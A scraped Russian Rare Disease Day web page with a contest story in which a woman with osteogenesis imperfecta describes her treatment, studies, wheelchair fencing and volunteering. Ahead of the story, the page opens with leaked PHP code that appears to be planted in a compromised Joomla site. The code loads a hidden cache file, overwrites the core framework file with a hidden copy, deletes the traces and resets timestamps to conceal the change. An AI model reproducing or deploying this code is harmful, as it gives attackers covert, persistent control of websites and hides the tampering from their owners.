$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Людям с редкими заболеваниями я советую верить в свое будущее, прислушиваться к себе и не ставить перед собой каких-либо рамок!
logo
 

28-02 международный день редких болезнейМеждународный день редких болезней

До дня редких болезней осталось

 
Home Вы находитесь здесь: Главная страница Конкурс "Напиши историю" Рассказы Людям с редкими заболеваниями я советую верить в свое будущее, прислушиваться к себе и не ставить перед собой каких-либо рамок!
Людям с редкими заболеваниями я советую верить в свое будущее, прислушиваться к себе и не ставить перед собой каких-либо рамок!

Анастасия Румянцева — девушка с диагнозом «несовершенный остеогенез». Анастасия является активным членом Санкт-Петербургского отделения Межрегиональной Общественной Организации инвалидов с заболеванием несовершеный остеогенез «Хрустальные люди», входящей в состав «ГАООРДИ».

«Я родилась в городе Ленинграде. Диагноз «несовершенный остеогенез» мне поставили еще в роддоме. Постоянно лежала в городских больницах с переломами. С пяти лет началось лечение в институте им. Турнера с помощью операций. Лечилась у врачей Елены Григорьевны Сосненко, Александра Павловича Поздеева и Фаиза Садрисламовича Зубоирова. Последнюю операцию делали в 15 лет. В 2004 году поступила на факультет книжного дела и редактирования в МГСГИ (ныне переименованный в МГСЭИ). С 2005 года начала заниматься фехтованием на колясках. В 2009-ом окончила институт, фехтованием продолжила заниматься в Петербурге. В данный момент я практически не тренируюсь, так как в 2014 г начала заниматься в театральной студии Безусловного театра. Не замужем, детей нет.

Конечно же, мой диагноз повлиял на мою жизнь. Но если бы не этот факт, я была бы другим человеком, и я не могу сейчас представить, как бы могло быть. На протяжении жизни мне помогают мама, мои родственники и друзья.

Несмотря на диагноз, я окончила факультет книгоиздания и редактирования МГСГИ. Также являюсь призером кубков и чемпионатов России по фехтованию на колясках, кандидатом в мастера спорта. Участвовала в творческом конкурсе «Это я» Санкт-Петербургской Общественной Правозащитной Организации Инвалидов «На коляске без барьеров». Спорт научил меня находить выход из трудных ситуаций.

Недавно в МООИ «Хрустальные люди» я помогала организовывать праздник совместно с фондом «Сегодня»: 7 февраля — Волшебный День для Хрустальных Людей. Стараюсь помогать по мере сил!

Я считаю, что детям с несовершенным остеогенезом необходимы стандарты лечения. Также хотелось бы отметить, что нужна волонтерская помощь для одиноких родителей с больными детьми (например, добровольцы в качестве временной няни).

Людям с редкими заболеваниями я советую верить в свое будущее, прислушиваться к себе и не ставить перед собой каких-либо рамок!

 

 
Главная | О дне редких | Мероприятия | Фото и видео | Стать другом | Конкурсы

Разработка сайта: DriveLab.ru